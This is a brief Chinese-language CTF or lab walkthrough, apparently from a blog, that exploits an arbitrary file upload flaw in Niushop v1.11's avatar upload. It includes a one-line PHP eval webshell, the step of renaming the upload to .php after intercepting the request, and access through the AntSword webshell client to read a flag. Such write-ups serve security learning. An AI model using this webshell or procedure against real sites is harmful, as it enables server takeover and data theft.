Niushop_v1.11_前台任意文件上传漏洞
1、访问首页:
http://IP/index.php
![](https://i-blog.csdnimg.cn/blog_migrate/e7232116643fa86288e406232d477836.png)
2、注册账号(账号密码随意),再登陆进去
![](https://i-blog.csdnimg.cn/blog_migrate/abec18e26467276074afa4d83bd210ab.png)
3、进入到个人中心
![](https://i-blog.csdnimg.cn/blog_migrate/bba20e7faacde2b79be8ff3d2951f8c1.png)
点击“个人资料”,再点击”更换头像“
![](https://i-blog.csdnimg.cn/blog_migrate/0954e3432176e404d192510f6bafcdb0.png)
4、选择构造好的图片马,该图片马中插入了一句话木马
\<?php eval(\$\_POST\['cmd']);?>
点击上传同时抓包:
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/89e02cf5299d572eedb0d6e5c5a8905b.png#pic_center)
修改后缀为php,点击“go”再右侧中间部分可看到路径,访问它,打开hackbar,以POST方式输入:cmd=phpinfo();
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/a2a9ccba249e9bf20977e1ddd63bf83d.png#pic_center)
连上蚁剑
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/ac7bda6369fe273687fbb7754f592e56.png#pic_center)
flag在www目录下
![在这里插入图片描述](https://i-blog.csdnimg.cn/blog_migrate/56d9f0244cf77b30d4690c011431cfda.png#pic_center)
flag{superfa_is_super_cool}